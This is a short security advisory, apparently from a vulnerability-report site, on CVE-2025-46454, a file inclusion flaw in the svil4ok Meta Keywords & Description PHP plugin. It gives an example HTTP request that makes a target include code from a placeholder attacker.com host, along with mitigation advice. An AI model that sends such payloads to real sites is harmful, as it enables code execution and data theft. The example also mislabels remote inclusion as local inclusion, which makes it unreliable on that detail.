Overview
This report assesses a serious vulnerability, CVE-2025-46454, that affects the svil4ok Meta Keywords & Description PHP program. This vulnerability can lead to a PHP Local File Inclusion, which could potentially compromise a system or leak sensitive data. Given that PHP is a widely used language for web development, this vulnerability could have widespread impacts.
Vulnerability Summary
CVE ID: CVE-2025-46454
Severity: High (7.5 CVSS)
Attack Vector: Network
Privileges Required: Low
User Interaction: None
Impact: Potential system compromise and data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
svil4ok Meta Keywords & Description | n/a to 0.8
How the Exploit Works
The exploit works by taking advantage of improper control of filename for an include/require statement in the svil4ok Meta Keywords & Description PHP program. An attacker can manipulate the filename to include a local file from the server, leading to a PHP Local File Inclusion. This could allow the attacker to execute arbitrary PHP code on the server, leading to potential system compromise or data leakage.
Conceptual Example Code
Here is a conceptual example of a HTTP request that could exploit this vulnerability:
GET /include.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: vulnerablewebsite.com
In the above example, the attacker is inserting their own server URL (`http://attacker.com/malicious_file.php`) into the `file` parameter. If the server processes this request, it may include the malicious file and execute any PHP code it contains.
Mitigation Guidance
It is recommended to apply the vendor patch as soon as it becomes available. In the meantime, you can use a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) as a temporary mitigation measure. Regularly updating and patching your PHP programs can help prevent such vulnerabilities from being exploited.

